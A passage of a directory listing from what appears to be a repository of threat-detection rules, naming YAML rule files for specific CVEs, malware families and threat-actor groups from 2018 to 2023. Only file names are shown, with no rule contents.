│ │ │ │ └── lnx_sshd_exploit_cve_2018_15473.yml
│ │ │ └── CVE-2018-2894/
│ │ │ └── web_cve_2018_2894_weblogic_exploit.yml
│ │ ├── Malware/
│ │ │ └── Elise-Backdoor/
│ │ │ └── proc_creation_win_malware_elise.yml
│ │ └── TA/
│ │ ├── APT27/
│ │ │ └── proc_creation_win_apt_apt27_emissary_panda.yml
│ │ ├── APT28/
│ │ │ └── proc_creation_win_apt_sofacy.yml
│ │ ├── APT29-CozyBear/
│ │ │ ├── file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml
│ │ │ └── proc_creation_win_apt_apt29_phishing_campaign_indicators.yml
│ │ ├── APT32-Oceanlotus/
│ │ │ └── registry_event_apt_oceanlotus_registry.yml
│ │ ├── MuddyWater/
│ │ │ └── proc_creation_win_apt_muddywater_activity.yml
│ │ ├── OilRig/
│ │ │ ├── proc_creation_win_apt_oilrig_mar18.yml
│ │ │ ├── registry_event_apt_oilrig_mar18.yml
│ │ │ ├── win_security_apt_oilrig_mar18.yml
│ │ │ └── win_system_apt_oilrig_mar18.yml
│ │ ├── Slingshot/
│ │ │ ├── proc_creation_win_apt_slingshot.yml
│ │ │ └── win_security_apt_slingshot.yml
│ │ └── TropicTrooper/
│ │ └── proc_creation_win_apt_tropictrooper.yml
│ ├── 2019/
│ │ ├── Exploits/
│ │ │ ├── BearLPE-Exploit/
│ │ │ │ └── proc_creation_win_exploit_other_bearlpe.yml
│ │ │ ├── CVE-2019-0708/
│ │ │ │ ├── win_security_exploit_cve_2019_0708_scanner_poc.yml
│ │ │ │ └── win_system_exploit_cve_2019_0708.yml
│ │ │ ├── CVE-2019-11510/
│ │ │ │ └── web_cve_2019_11510_pulsesecure_exploit.yml
│ │ │ ├── CVE-2019-1378/
│ │ │ │ └── proc_creation_win_exploit_cve_2019_1378.yml
│ │ │ ├── CVE-2019-1388/
│ │ │ │ └── proc_creation_win_exploit_cve_2019_1388.yml
│ │ │ ├── CVE-2019-14287/
│ │ │ │ ├── lnx_sudo_exploit_cve_2019_14287.yml
│ │ │ │ └── proc_creation_lnx_exploit_cve_2019_14287.yml
│ │ │ ├── CVE-2019-19781/
│ │ │ │ └── web_cve_2019_19781_citrix_exploit.yml
│ │ │ └── CVE-2019-3398/
│ │ │ └── web_cve_2019_3398_confluence.yml
│ │ ├── Malware/
│ │ │ ├── BabyShark/
│ │ │ │ └── proc_creation_win_malware_babyshark.yml
│ │ │ ├── Chafer/
│ │ │ │ └── proxy_malware_chafer_url_pattern.yml
│ │ │ ├── Dridex/
│ │ │ │ └── proc_creation_win_malware_dridex.yml
│ │ │ ├── Dtrack-RAT/
│ │ │ │ └── proc_creation_win_malware_dtrack.yml
│ │ │ ├── Emotet/
│ │ │ │ └── proc_creation_win_malware_emotet.yml
│ │ │ ├── Formbook/
│ │ │ │ └── proc_creation_win_malware_formbook.yml
│ │ │ ├── LockerGoga/
│ │ │ │ └── proc_creation_win_malware_lockergoga_ransomware.yml
│ │ │ ├── QBot/
│ │ │ │ └── proc_creation_win_malware_qbot.yml
│ │ │ ├── Ryuk/
│ │ │ │ └── proc_creation_win_malware_ryuk.yml
│ │ │ ├── Snatch/
│ │ │ │ └── proc_creation_win_malware_snatch_ransomware.yml
│ │ │ └── Ursnif/
│ │ │ ├── proxy_malware_ursnif_c2_url.yml
│ │ │ ├── proxy_malware_ursnif_download_url.yml
│ │ │ └── registry_add_malware_ursnif.yml
│ │ └── TA/
│ │ ├── APC-C-12/
│ │ │ └── proc_creation_win_apt_aptc12_bluemushroom.yml
│ │ ├── APT31/
│ │ │ └── proc_creation_win_apt_apt31_judgement_panda.yml
│ │ ├── APT40/
│ │ │ └── proxy_apt_apt40_dropbox_tool_ua.yml
│ │ ├── Bear-APT-Activity/
│ │ │ └── proc_creation_win_apt_bear_activity_gtr19.yml
│ │ ├── EmpireMonkey/
│ │ │ └── proc_creation_win_apt_empiremonkey.yml
│ │ ├── EquationGroup/
│ │ │ └── proc_creation_win_apt_equationgroup_dll_u_load.yml
│ │ ├── MustangPanda/
│ │ │ └── proc_creation_win_apt_mustangpanda.yml
│ │ └── Operation-Wocao/
│ │ ├── README.md
│ │ ├── proc_creation_win_apt_wocao.yml
│ │ └── win_security_apt_wocao.yml
│ ├── 2020/
│ │ ├── Exploits/
│ │ │ ├── CVE-2020-0688/
│ │ │ │ ├── web_cve_2020_0688_exchange_exploit.yml
│ │ │ │ ├── web_cve_2020_0688_msexchange.yml
│ │ │ │ └── win_vul_cve_2020_0688.yml
│ │ │ ├── CVE-2020-10148/
│ │ │ │ └── web_cve_2020_10148_solarwinds_exploit.yml
│ │ │ ├── CVE-2020-10189/
│ │ │ │ └── proc_creation_win_exploit_cve_2020_10189.yml
│ │ │ ├── CVE-2020-1048/
│ │ │ │ ├── proc_creation_win_exploit_cve_2020_1048.yml
│ │ │ │ └── registry_set_exploit_cve_2020_1048_new_printer_port.yml
│ │ │ ├── CVE-2020-1350/
│ │ │ │ └── proc_creation_win_exploit_cve_2020_1350.yml
│ │ │ ├── CVE-2020-1472/
│ │ │ │ └── proc_creation_win_exploit_cve_2020_1472_zero_poc.yml
│ │ │ ├── CVE-2020-14882/
│ │ │ │ └── web_cve_2020_14882_weblogic_exploit.yml
│ │ │ ├── CVE-2020-28188/
│ │ │ │ └── web_cve_2020_28188_terramaster_rce_exploit.yml
│ │ │ ├── CVE-2020-3452/
│ │ │ │ └── web_cve_2020_3452_cisco_asa_ftd.yml
│ │ │ ├── CVE-2020-5902/
│ │ │ │ └── web_cve_2020_5902_f5_bigip.yml
│ │ │ └── CVE-2020-8193/
│ │ │ └── web_cve_2020_8193_8195_citrix_exploit.yml
│ │ ├── Malware/
│ │ │ ├── Blue-Mockingbird/
│ │ │ │ ├── proc_creation_win_malware_blue_mockingbird.yml
│ │ │ │ └── registry_set_mal_blue_mockingbird.yml
│ │ │ ├── ComRAT/
│ │ │ │ └── proxy_malware_comrat_network_indicators.yml
│ │ │ ├── Emotet/
│ │ │ │ └── proc_creation_win_malware_emotet_rundll32_execution.yml
│ │ │ ├── FlowCloud/
│ │ │ │ └── registry_event_malware_flowcloud_markers.yml
│ │ │ ├── Ke3chang-TidePool/
│ │ │ │ └── proc_creation_win_malware_ke3chang_tidepool.yml
│ │ │ ├── Maze/
│ │ │ │ └── proc_creation_win_malware_maze_ransomware.yml
│ │ │ └── Trickbot/
│ │ │ └── proc_creation_win_malware_trickbot_wermgr.yml
│ │ └── TA/
│ │ ├── Evilnum/
│ │ │ └── proc_creation_win_apt_evilnum_jul20.yml
│ │ ├── GALLIUM/
│ │ │ ├── proc_creation_win_apt_gallium_iocs.yml
│ │ │ └── win_dns_analytic_apt_gallium.yml
│ │ ├── Greenbug/
│ │ │ └── proc_creation_win_apt_greenbug_may20.yml
│ │ ├── Lazarus/
│ │ │ └── proc_creation_win_apt_lazarus_group_activity.yml
│ │ ├── Leviathan/
│ │ │ └── registry_event_apt_leviathan.yml
│ │ ├── SolarWinds-Supply-Chain/
│ │ │ ├── README.md
│ │ │ ├── proc_creation_win_apt_unc2452_cmds.yml
│ │ │ ├── proc_creation_win_apt_unc2452_ps.yml
│ │ │ ├── proc_creation_win_apt_unc2452_vbscript_pattern.yml
│ │ │ └── web_solarwinds_supernova_webshell.yml
│ │ ├── TAIDOOR-RAT/
│ │ │ └── proc_creation_win_apt_taidoor.yml
│ │ └── Winnti/
│ │ ├── proc_creation_win_apt_winnti_mal_hk_jan20.yml
│ │ └── proc_creation_win_apt_winnti_pipemon.yml
│ ├── 2021/
│ │ ├── Exploits/
│ │ │ ├── CVE-2021-1675/
│ │ │ │ ├── av_exploit_cve_2021_34527_print_nightmare.yml
│ │ │ │ ├── file_delete_win_exploit_cve_2021_1675_print_nightmare.yml
│ │ │ │ ├── file_event_win_exploit_cve_2021_1675_printspooler.yml
│ │ │ │ ├── image_load_exploit_cve_2021_1675_spoolsv_dll_load.yml
│ │ │ │ ├── registry_event_cve_2021_1675_mimikatz_printernightmare_drivers.yml
│ │ │ │ ├── win_exploit_cve_2021_1675_printspooler.yml
│ │ │ │ ├── win_exploit_cve_2021_1675_printspooler_operational.yml
│ │ │ │ ├── win_security_exploit_cve_2021_1675_printspooler_security.yml
│ │ │ │ └── zeek_dce_rpc_exploit_cve_2021_1675_printnightmare_print_driver_install.yml
│ │ │ ├── CVE-2021-20090/
│ │ │ │ └── web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml
│ │ │ ├── CVE-2021-2109/
│ │ │ │ └── web_cve_2021_2109_weblogic_rce_exploit.yml
│ │ │ ├── CVE-2021-21972/
│ │ │ │ └── web_cve_2021_21972_vsphere_unauth_rce_exploit.yml
│ │ │ ├── CVE-2021-21978/
│ │ │ │ └── web_cve_2021_21978_vmware_view_planner_exploit.yml
│ │ │ ├── CVE-2021-22005/
│ │ │ │ └── web_cve_2021_22005_vmware_file_upload.yml
│ │ │ ├── CVE-2021-22123/
│ │ │ │ └── web_cve_2021_22123_fortinet_exploit.yml
│ │ │ ├── CVE-2021-22893/
│ │ │ │ └── web_cve_2021_22893_pulse_secure_rce_exploit.yml
│ │ │ ├── CVE-2021-26084/
│ │ │ │ ├── proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml
│ │ │ │ └── web_cve_2021_26084_confluence_rce_exploit.yml
│ │ │ ├── CVE-2021-26814/
│ │ │ │ └── web_cve_2021_26814_wzuh_rce.yml
│ │ │ ├── CVE-2021-26857/
│ │ │ │ └── proc_creation_win_exploit_cve_2021_26857_msexchange.yml
│ │ │ ├── CVE-2021-26858/
│ │ │ │ ├── file_event_win_cve_2021_26858_msexchange.yml
│ │ │ │ └── web_cve_2021_26858_iis_rce.yml
│ │ │ ├── CVE-2021-27905/
│ │ │ │ └── web_cve_2021_27905_apache_solr_exploit.yml
│ │ │ ├── CVE-2021-28480/
│ │ │ │ └── web_cve_2021_28480_exchange_exploit.yml
│ │ │ ├── CVE-2021-33766/
│ │ │ │ └── web_cve_2021_33766_msexchange_proxytoken.yml
│ │ │ ├── CVE-2021-33771/
│ │ │ │ ├── file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml
│ │ │ │ └── registry_set_cve_2021_31979_cve_2021_33771_exploits.yml
│ │ │ ├── CVE-2021-35211/
│ │ │ │ └── proc_creation_win_exploit_cve_2021_35211_servu.yml
│ │ │ ├── CVE-2021-38647/
│ │ │ │ └── zeek_http_exploit_cve_2021_38647_omigod_no_auth_rce.yml
│ │ │ ├── CVE-2021-4034/
│ │ │ │ └── lnx_auth_exploit_cve_2021_4034_pwnkit_lpe.yml
│ │ │ ├── CVE-2021-40444/
│ │ │ │ ├── file_event_win_exploit_cve_2021_40444.yml
│ │ │ │ ├── proc_creation_win_exploit_cve_2021_40444.yml
│ │ │ │ └── proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml
│ │ │ ├── CVE-2021-40539/
│ │ │ │ ├── web_cve_2021_40539_adselfservice.yml
│ │ │ │ └── web_cve_2021_40539_manageengine_adselfservice_exploit.yml
│ │ │ ├── CVE-2021-41379/
│ │ │ │ ├── file_event_win_cve_2021_41379_msi_lpe.yml
│ │ │ │ ├── proc_creation_win_exploit_cve_2021_41379.yml
│ │ │ │ └── win_vul_cve_2021_41379.yml
│ │ │ ├── CVE-2021-41773/
│ │ │ │ └── web_cve_2021_41773_apache_path_traversal.yml
│ │ │ ├── CVE-2021-42237/
│ │ │ │ └── web_cve_2021_42237_sitecore_report_ashx.yml
│ │ │ ├── CVE-2021-42278/
│ │ │ │ └── win_system_exploit_cve_2021_42278.yml
│ │ │ ├── CVE-2021-42287/
│ │ │ │ ├── win_security_samaccountname_spoofing_cve_2021_42287.yml
│ │ │ │ └── win_system_exploit_cve_2021_42287.yml
│ │ │ ├── CVE-2021-42321/
│ │ │ │ └── win_exchange_cve_2021_42321.yml
│ │ │ ├── CVE-2021-43798/
│ │ │ │ └── web_cve_2021_43798_grafana.yml
│ │ │ ├── CVE-2021-44077/
│ │ │ │ └── file_event_win_cve_2021_44077_poc_default_files.yml
│ │ │ ├── CVE-2021-44228/
│ │ │ │ ├── proc_creation_win_exploit_cve_2021_44228_vmware_horizon_log4j.yml
│ │ │ │ ├── web_cve_2021_44228_log4j.yml
│ │ │ │ └── web_cve_2021_44228_log4j_fields.yml
│ │ │ ├── ProxyShell-Exploit/
│ │ │ │ ├── web_exchange_proxyshell.yml
│ │ │ │ └── web_exchange_proxyshell_successful.yml
│ │ │ ├── RazerInstaller-LPE-Exploit/
│ │ │ │ └── proc_creation_win_exploit_other_razorinstaller_lpe.yml
│ │ │ ├── SystemNightmare-Exploit/
│ │ │ │ └── proc_creation_win_exploit_other_systemnightmare.yml
│ │ │ └── VisualDoor-Exploit/
│ │ │ ├── README.md
│ │ │ └── web_sonicwall_jarrewrite_exploit.yml
│ │ ├── Malware/
│ │ │ ├── BlackByte/
│ │ │ │ ├── proc_creation_win_malware_blackbyte_ransomware.yml
│ │ │ │ └── registry_set_win_malware_blackbyte_privesc_registry.yml
│ │ │ ├── Conti/
│ │ │ │ ├── proc_creation_win_malware_conti.yml
│ │ │ │ ├── proc_creation_win_malware_conti_7zip.yml
│ │ │ │ ├── proc_creation_win_malware_conti_ransomware_commands.yml
│ │ │ │ └── proc_creation_win_malware_conti_ransomware_database_dump.yml
│ │ │ ├── DarkSide/
│ │ │ │ └── proc_creation_win_malware_darkside_ransomware.yml
│ │ │ ├── Devil-Bait/
│ │ │ │ ├── README.md
│ │ │ │ ├── file_event_win_malware_devil_bait_script_drop.yml
│ │ │ │ ├── proc_creation_win_malware_devil_bait_output_redirect.yml
│ │ │ │ └── proxy_malware_devil_bait_c2_communication.yml
│ │ │ ├── FoggyWeb/
│ │ │ │ └── image_load_malware_foggyweb_nobelium.yml
│ │ │ ├── Goofy-Guineapig/
│ │ │ │ ├── README.md
│ │ │ │ ├── file_event_win_malware_goofy_guineapig_file_indicators.yml
│ │ │ │ ├── proc_creation_win_malware_goofy_guineapig_broken_cmd.yml
│ │ │ │ ├── proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml
│ │ │ │ ├── proxy_malware_goofy_gunieapig_c2_communication.yml
│ │ │ │ └── win_system_malware_goofy_guineapig_service_persistence.yml
│ │ │ ├── Moriya-Rootkit/
│ │ │ │ └── file_event_win_moriya_rootkit.yml
│ │ │ ├── Netwire/
│ │ │ │ └── registry_add_malware_netwire.yml
│ │ │ ├── Pingback/
│ │ │ │ ├── file_event_win_malware_pingback_backdoor.yml
│ │ │ │ ├── image_load_malware_pingback_backdoor.yml
│ │ │ │ └── proc_creation_win_malware_pingback_backdoor.yml
│ │ │ └── Small-Sieve/
│ │ │ ├── README.md
│ │ │ ├── file_event_win_malware_small_sieve_evasion_typo.yml
│ │ │ ├── proc_creation_win_malware_small_sieve_cli_arg.yml
│ │ │ ├── proxy_malware_small_sieve_telegram_communication.yml
│ │ │ └── registry_set_malware_small_sieve_evasion_typo.yml
│ │ └── TA/
│ │ ├── HAFNIUM/
│ │ │ ├── proc_creation_win_apt_hafnium.yml
│ │ │ └── web_exchange_exploitation_hafnium.yml
│ │ ├── Kaseya-Supply-Chain/
│ │ │ └── proc_creation_win_apt_revil_kaseya.yml
│ │ ├── PRIVATELOG/
│ │ │ └── image_load_usp_svchost_clfsw32.yml
│ │ ├── SOURGUM/
│ │ │ └── proc_creation_win_apt_sourgrum.yml
│ │ └── UNC2546/
│ │ └── web_unc2546_dewmode_php_webshell.yml
│ ├── 2022/
│ │ ├── Exploits/
│ │ │ ├── CVE-2022-21554/
│ │ │ │ └── proc_creation_win_exploit_cve_2023_21554_queuejumper.yml
│ │ │ ├── CVE-2022-21587/
│ │ │ │ └── web_cve_2022_21587_oracle_ebs.yml
│ │ │ ├── CVE-2022-21919/
│ │ │ │ └── win_system_exploit_cve_2022_21919_or_cve_2021_34484.yml
│ │ │ ├── CVE-2022-22954/
│ │ │ │ └── proc_creation_win_exploit_cve_2022_22954_vmware_workspace_one_rce.yml
│ │ │ ├── CVE-2022-24527/
│ │ │ │ └── file_event_win_cve_2022_24527_lpe.yml
│ │ │ ├── CVE-2022-26134/
│ │ │ │ └── proc_creation_lnx_exploit_cve_2022_26134_atlassian_confluence.yml
│ │ │ ├── CVE-2022-26809/
│ │ │ │ └── proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml
│ │ │ ├── CVE-2022-27925/
│ │ │ │ └── web_cve_2022_27925_exploit.yml
│ │ │ ├── CVE-2022-29072/
│ │ │ │ └── proc_creation_win_exploit_cve_2022_29072_7zip.yml
│ │ │ ├── CVE-2022-29799/
│ │ │ │ └── lnx_exploit_cve_2022_27999_cve_2022_27800.yml
│ │ │ ├── CVE-2022-30190/
│ │ │ │ └── registry_set_exploit_cve_2022_30190_msdt_follina.yml
│ │ │ ├── CVE-2022-31656/
│ │ │ │ └── web_cve_2022_31656_auth_bypass.yml
│ │ │ ├── CVE-2022-31659/
│ │ │ │ └── web_cve_2022_31659_vmware_rce.yml
│ │ │ ├── CVE-2022-33891/
│ │ │ │ ├── proc_creation_lnx_exploit_cve_2022_33891_spark_shell_command_injection.yml
│ │ │ │ └── web_cve_2022_33891_spark_shell_command_injection.yml
│ │ │ ├── CVE-2022-36804/
│ │ │ │ └── web_cve_2022_36804_atlassian_bitbucket_command_injection.yml
│ │ │ ├── CVE-2022-37966/
│ │ │ │ └── win_system_exploit_cve_2022_37966_kdcsvc_rc4_downgrade.yml
│ │ │ ├── CVE-2022-41082/
│ │ │ │ ├── proxy_cve_2022_36804_exchange_owassrf_exploitation.yml
│ │ │ │ ├── proxy_cve_2022_36804_exchange_owassrf_poc_exploitation.yml
│ │ │ │ ├── web_cve_2022_36804_exchange_owassrf_exploitation.yml
│ │ │ │ └── web_cve_2022_36804_exchange_owassrf_poc_exploitation.yml
│ │ │ ├── CVE-2022-41120/
│ │ │ │ └── proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml
│ │ │ ├── CVE-2022-42475/
│ │ │ │ └── fortios_sslvpnd_exploit_cve_2022_42475_exploitation_indicators.yml
│ │ │ ├── CVE-2022-44877/
│ │ │ │ └── web_cve_2022_44877_exploitation_attempt.yml
│ │ │ └── CVE-2022-46169/
│ │ │ └── web_cve_2022_46169_cacti_exploitation_attempt.yml
│ │ ├── Malware/
│ │ │ ├── BlueSky-Ransomware/
│ │ │ │ └── win_security_malware_bluesky_ransomware_files_indicators.yml
│ │ │ ├── Bumblebee/
│ │ │ │ └── create_remote_thread_win_malware_bumblebee.yml
│ │ │ ├── ChromeLoader/
│ │ │ │ └── proc_creation_win_malware_chrome_loader_execution.yml
│ │ │ ├── Emotet/
│ │ │ │ └── proc_creation_win_malware_emotet_loader_execution.yml
│ │ │ ├── Hermetic-Wiper/
│ │ │ │ └── proc_creation_win_malware_hermetic_wiper_activity.yml
│ │ │ ├── Raspberry-Robin/
│ │ │ │ ├── proc_creation_win_malware_raspberry_robin_execution.yml
│ │ │ │ ├── proc_creation_win_malware_raspberry_robin_external_drive_exec.yml
│ │ │ │ └── proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml
│ │ │ ├── Serpent-Backdoor/
│ │ │ │ └── proc_creation_win_malware_serpent_backdoor_payload_execution.yml
│ │ │ ├── SocGholish/
│ │ │ │ └── proc_creation_win_malware_socgholish_fakeupdates_activity.yml
│ │ │ └── win_mssql_sp_maggie.yml
│ │ └── TA/
│ │ ├── ACTINIUM/
│ │ │ └── proc_creation_win_apt_actinium_persistence.yml
│ │ └── MERCURY/
│ │ └── proc_creation_win_apt_mercury.yml
│ ├── 2023/
│ │ ├── Exploits/
│ │ │ ├── CVE-2023-1389/
│ │ │ │ └── proxy_exploit_cve_2023_1389_unauth_command_injection_tplink_archer_ax21.yml
│ │ │ ├── CVE-2023-20198/
│ │ │ │ └── cisco_syslog_cve_2023_20198_ios_xe_web_ui.yml
│ │ │ ├── CVE-2023-21554/
│ │ │ │ └── win_cve_2023_21554_msmq_corrupted_packet.yml
│ │ │ ├── CVE-2023-22518/
│ │ │ │ ├── proc_creation_lnx_exploit_cve_2023_22518_confluence_java_child_proc.yml
│ │ │ │ ├── proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml
│ │ │ │ ├── proxy_exploit_cve_2023_22518_confluence_auth_bypass.yml
│ │ │ │ └── web_exploit_cve_2023_22518_confluence_auth_bypass.yml
│ │ │ ├── CVE-2023-2283/
│ │ │ │ └── lnx_sshd_exploit_cve_2023_2283_libssh_authentication_bypass.yml
│ │ │ ├── CVE-2023-23397/
│ │ │ │ ├── registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml
│ │ │ │ ├── win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml
│ │ │ │ └── win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml
│ │ │ ├── CVE-2023-23752/
│ │ │ │ └── web_cve_2023_23752_joomla_exploit_attempt.yml
│ │ │ ├── CVE-2023-25157/
│ │ │ │ └── web_cve_2023_25157_geoserver_sql_injection.yml
│ │ │ ├── CVE-2023-25717/
│ │ │ │ └── web_cve_2023_25717_ruckus_wireless_admin_exploit_attempt.yml
│ │ │ ├── CVE-2023-27363/
│ │ │ │ └── file_event_win_cve_2023_27363_foxit_rce.yml
│ │ │ ├── CVE-2023-27997/
│ │ │ │ └── web_cve_2023_27997_pre_authentication_rce.yml
│ │ │ ├── CVE-2023-34362-MOVEit-Transfer-Exploit/
│ │ │ │ ├── README.md
│ │ │ │ ├── file_event_win_exploit_cve_2023_34362_moveit_transfer.yml
│ │ │ │ ├── proc_creation_win_exploit_cve_2023_34362_moveit_transfer_exploitation_activity.yml
│ │ │ │ └── web_cve_2023_34362_known_payload_request.yml.yml
│ │ │ ├── CVE-2023-36874/
│ │ │ │ ├── file_event_win_exploit_cve_2023_36874_report_creation.yml
│ │ │ │ ├── file_event_win_exploit_cve_2023_36874_wermgr_creation.yml
│ │ │ │ └── proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml
│ │ │ ├── CVE-2023-36884/
│ │ │ │ ├── file_event_win_exploit_cve_2023_36884_office_windows_html_rce_file_patterns.yml
│ │ │ │ ├── proxy_exploit_cve_2023_36884_office_windows_html_rce.yml
│ │ │ │ ├── proxy_exploit_cve_2023_36884_office_windows_html_rce_extenstion_ip_pattern_traffic.yml
│ │ │ │ ├── proxy_exploit_cve_2023_36884_office_windows_html_rce_traffic.yml
│ │ │ │ ├── proxy_exploit_cve_2023_36884_office_windows_html_rce_url_marker_traffic.yml
│ │ │ │ └── win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml
│ │ │ ├── CVE-2023-38831/
│ │ │ │ ├── file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml
│ │ │ │ └── proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml
│ │ │ ├── CVE-2023-40477/
│ │ │ │ ├── file_event_win_exploit_cve_2023_40477_winrar_rev_file_abuse.yml
│ │ │ │ └── win_application_exploit_cve_2023_40477_winrar_crash.yml
│ │ │ ├── CVE-2023-43261/
│ │ │ │ ├── proxy_exploit_cve_2023_43261_milesight_information_disclosure.yml
│ │ │ │ └── web_exploit_cve_2023_43261_milesight_information_disclosure.yml
│ │ │ ├── CVE-2023-46214/
│ │ │ │ ├── web_cve_2023_46214_rce_splunk_enterprise.yml
│ │ │ │ └── web_cve_2023_46214_rce_splunk_enterprise_poc.yml
│ │ │ ├── CVE-2023-46747/
│ │ │ │ ├── proxy_cve_2023_46747_f5_remote_code_execution.yml
│ │ │ │ └── web_cve_2023_46747_f5_remote_code_execution.yml
│ │ │ ├── CVE-2023-4966/
│ │ │ │ ├── proxy_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit.yml
│ │ │ │ ├── proxy_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit_attempt.yml
│ │ │ │ ├── web_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit.yml
│ │ │ │ └── web_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit_attempt.yml
│ │ │ └── Windows-Server-Unknown-Exploit/
│ │ │ └── proc_creation_win_exploit_other_win_server_undocumented_rce.yml
│ │ ├── Malware/
│ │ │ ├── COLDSTEEL/
│ │ │ │ ├── README.md
│ │ │ │ ├── file_event_win_malware_coldsteel_renamed_cmd.yml
│ │ │ │ ├── file_event_win_malware_coldsteel_service_dll_creation.yml
│ │ │ │ ├── image_load_malware_coldsteel_persistence_service_dll.yml
│ │ │ │ ├── proc_creation_win_malware_coldsteel_anonymous_process.yml
│ │ │ │ ├── proc_creation_win_malware_coldsteel_cleanup.yml
│ │ │ │ ├── proc_creation_win_malware_coldsteel_service_persistence.yml
│ │ │ │ ├── registry_set_malware_coldsteel_created_users.yml
│ │ │ │ └── win_system_malware_coldsteel_persistence_service.yml
│ │ │ ├── DarkGate/
│ │ │ │ ├── README.md
│ │ │ │ ├── file_event_win_malware_darkgate_autoit3_binary_creation.yml
│ │ │ │ ├── proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml
│ │ │ │ └── proc_creation_win_malware_darkgate_net_user_creation.yml
│ │ │ ├── Griffon/
│ │ │ │ └── proc_creation_win_malware_griffon_patterns.yml
│ │ │ ├── GuLoader/
│ │ │ │ └── proc_creation_win_malware_guloader_execution.yml
│ │ │ ├── IcedID/
│ │ │ │ └── proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml
│ │ │ ├── Pikabot/
│ │ │ │ ├── net_connection_win_malware_pikabot_rundll32_activity.yml
│ │ │ │ ├── proc_creation_win_malware_pikabot_combined_commands_execution.yml
│ │ │ │ ├── proc_creation_win_malware_pikabot_discovery.yml
│ │ │ │ ├── proc_creation_win_malware_pikabot_rundll32_hollowing.yml
│ │ │ │ └── proc_creation_win_malware_pikabot_rundll32_uncommon_extension.yml
│ │ │ ├── Qakbot/
│ │ │ │ ├── README.md
│ │ │ │ ├── proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml
│ │ │ │ ├── proc_creation_win_malware_qakbot_rundll32_execution.yml
│ │ │ │ ├── proc_creation_win_malware_qakbot_rundll32_exports.yml
│ │ │ │ ├── proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml
│ │ │ │ └── proc_creation_win_malware_qakbot_uninstaller_cleanup.yml
│ │ │ ├── Rhadamanthys/
│ │ │ │ └── proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml
│ │ │ ├── Rorschach/
│ │ │ │ └── proc_creation_win_malware_rorschach_ransomware_activity.yml
│ │ │ ├── SNAKE/
│ │ │ │ ├── README.md
│ │ │ │ ├── file_event_win_malware_snake_encrypted_payload_ioc.yml
│ │ │ │ ├── file_event_win_malware_snake_installers_ioc.yml
│ │ │ │ ├── file_event_win_malware_snake_werfault_creation.yml
│ │ │ │ ├── proc_creation_win_malware_snake_installer_cli_args.yml
│ │ │ │ ├── proc_creation_win_malware_snake_installer_exec.yml
│ │ │ │ ├── proc_creation_win_malware_snake_service_execution.yml
│ │ │ │ ├── registry_event_malware_snake_covert_store_key.yml
│ │ │ │ ├── registry_set_malware_snake_encrypted_key.yml
│ │ │ │ └── win_system_malware_snake_persistence_service.yml
│ │ │ ├── Ursnif/
│ │ │ │ └── proc_creation_win_malware_ursnif_cmd_redirection.yml
│ │ │ └── dns_query_win_malware_socgholish_second_stage_c2.yml
│ │ └── TA/
│ │ ├── 3CX-Supply-Chain/
│ │ │ ├── README.md
│ │ │ ├── dns_query_win_malware_3cx_compromise.yml
│ │ │ ├── image_load_malware_3cx_compromise_susp_dll.yml
│ │ │ ├── net_connection_win_malware_3cx_compromise_beaconing_activity.yml
│ │ │ ├── proc_creation_win_malware_3cx_compromise_execution.yml
│ │ │ ├── proc_creation_win_malware_3cx_compromise_susp_children.yml
│ │ │ ├── proc_creation_win_malware_3cx_compromise_susp_update.yml
│ │ │ ├── proxy_malware_3cx_compromise_c2_beacon_activity.yml
│ │ │ └── proxy_malware_3cx_compromise_susp_ico_requests.yml
│ │ ├── Cozy-Bear/
│ │ │ ├── image_load_apt_cozy_bear_graphical_proton_dlls.yml
│ │ │ ├── win_security_apt_cozy_bear_scheduled_tasks_name.yml
│ │ │ └── win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml
│ │ ├── Diamond-Sleet/
│ │ │ ├── README.md
│ │ │ ├── dns_query_win_apt_diamond_steel_indicators.yml
│ │ │ ├── file_event_win_apt_diamond_sleet_indicators.yml
│ │ │ ├── image_load_apt_diamond_sleet_side_load.yml
│ │ │ ├── proc_creation_win_apt_diamond_sleet_indicators.yml
│ │ │ ├── registry_event_apt_diamond_sleet_scheduled_task.yml
│ │ │ └── win_security_apt_diamond_sleet_scheduled_task.yml
│ │ ├── EquationGroup/
│ │ │ ├── net_dns_apt_equation_group_triangulation_c2_coms.yml
│ │ │ └── proxy_apt_equation_group_triangulation_c2_coms.yml
│ │ ├── FIN7/
│ │ │ ├── README.md
│ │ │ ├── file_event_win_apt_fin7_powershell_scripts_naming_convention.yml
│ │ │ ├── posh_ps_apt_fin7_powerhold.yml
│ │ │ ├── posh_ps_apt_fin7_powertrash_execution.yml
│ │ │ └── proc_creation_win_apt_fin7_powertrash_lateral_movement.yml
│ │ ├── Lace-Tempest/
│ │ │ ├── README.md
│ │ │ ├── file_event_win_apt_lace_tempest_indicators.yml
│ │ │ ├── posh_ps_apt_lace_tempest_eraser_script.yml
│ │ │ ├── posh_ps_apt_lace_tempest_malware_launcher.yml
│ │ │ ├── proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml
│ │ │ └── proc_creation_win_apt_lace_tempest_loader_execution.yml
│ │ ├── Lazarus/
│ │ │ ├── README.md
